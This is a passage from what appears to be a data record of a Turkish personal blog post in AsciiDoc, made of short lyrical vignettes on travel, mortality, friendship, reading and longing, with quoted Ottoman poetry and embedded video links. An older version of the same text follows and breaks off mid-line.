\u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDar\u0131lma, i\u015fte b\u00f6yle... +\n_\"Durup dinlenmeden akarsa p\u0131nar,_ +\n_Her y\u0131l k\u0131\u015ftan sonra gelirse bahar,_ +\n_Bal\u0131klar\u0131n suyu sevdi\u011fi kadar,_ +\n_Ben de seni seviyorum, dar\u0131lma.\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f","old_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi 